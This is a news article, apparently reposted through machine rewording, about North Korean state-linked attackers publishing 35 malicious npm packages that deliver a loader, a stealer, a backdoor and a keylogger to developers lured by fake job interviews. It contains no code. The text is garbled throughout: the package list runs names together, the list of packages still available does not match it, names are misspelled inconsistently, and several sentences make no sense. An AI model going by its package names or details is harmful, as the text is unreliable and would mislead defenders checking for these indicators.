Cybersecurity researchers have discovered fresh batches of malicious NPM packages linked to an ongoing infectious interview operation that emerged from North Korea.
According to Socket, the ongoing supply chain attacks include 35 malicious packages uploaded from 24 npm accounts. These packages have been downloaded collectively over 4,000 times. The complete list of JavaScript libraries can be found below –
React-Plaid-sdk sumsub-node-websdk vite-plugin-next-refresh-plugin-purify nextjs-insight-insight-svgn-svgn node-loggers react-logs reactbootstrap test-topdev-logger-v1 test-topdev-logger-v3 server-log-engine logbin-nodejs vite-loader-svg struct-logger flexible – Logan beautiful plugin choke configuration Jsonpacks router pulse
Of these, six continue to be available for download from NPM: React-Plaid-SDK, SumSub-Node-WebsDK, Vite-Plugin-Next-Refresh, Vite-Loader-SVG, Node-Orm-Mongoose, and Router-Parse.
Each identified NPM package contains a hex loader called Hexeval. It is designed to collect host information installations and selectively provide a follow-on payload responsible for delivering known JavaScript Stealers called Beavertail.
Beavertail is configured to download and run a Python backdoor called Invisibleferret, allowing threat actors to collect sensitive data and establish remote control for infected hosts.
“This nesting doll structure helps the campaign avoid basic static scanners and manual reviews,” said Socket researcher Kirill Boychenko. “One NPM alias also ships a cross-platform keylogger package that captures all keystrokes, indicating the preparation of threat actors to coordinate payloads for deeper surveillance when the target guarantees it.”
The infectiousness interview, first published in late 2023 by Palo Alto Networks Unit 42, is an ongoing campaign conducted by threat actors sponsored by the North Korean state to gain unauthorized access to developer systems with the aim of carrying out cryptocurrency and data theft.
This cluster is also widely tracked under Monika CL-STA-0240, deceptivedevelopment, dev #popper, famous Cholima, Gwishin gang, tenacious Punsan, UNC5342, and void dokkaebi.
Recent iterations of the campaign have also been observed to use Clickfix social engineering tactics to provide malware such as Golangghost and Pylangjost. A subcluster of this activity is named Clickfake Interview.
The latest findings from socket points to multifaceted approaches in which Pyongyang threat actors are taunting future targets in order to install malware under the pretext of interviews and Zoom meetings.
NPM derivation of infectious interviews usually sends attackers who code job seekers and developers by sharing links to malicious projects hosted on Github or Bitbucket.
“They target active job hunting software engineers and misuse the trust that job seekers usually place on recruiters,” says Boychenko. “Fake personas often start communicating with scripted outreach messages and persuasive explanations of Job.”
The victims are then cloned and performed outside the containerized environment during the cloning of this project and interviewed interview process.
“This malicious campaign highlights the evolving trademarks in North Korea’s supply chain attacks, a blend of malware staging, OSINT-led targeting and social engineering to compromise developers through a trusted ecosystem,” Sockett said.
“By embedding malware loaders like hexival in open source packages, assigning fake jobs, hindering perimeter defenses to attack threat actors, and gaining run on the target developer’s system. It attempts to avoid the multi-stage structure of the campaign, minimal on-registration footprint, and containerized environments.
Source link
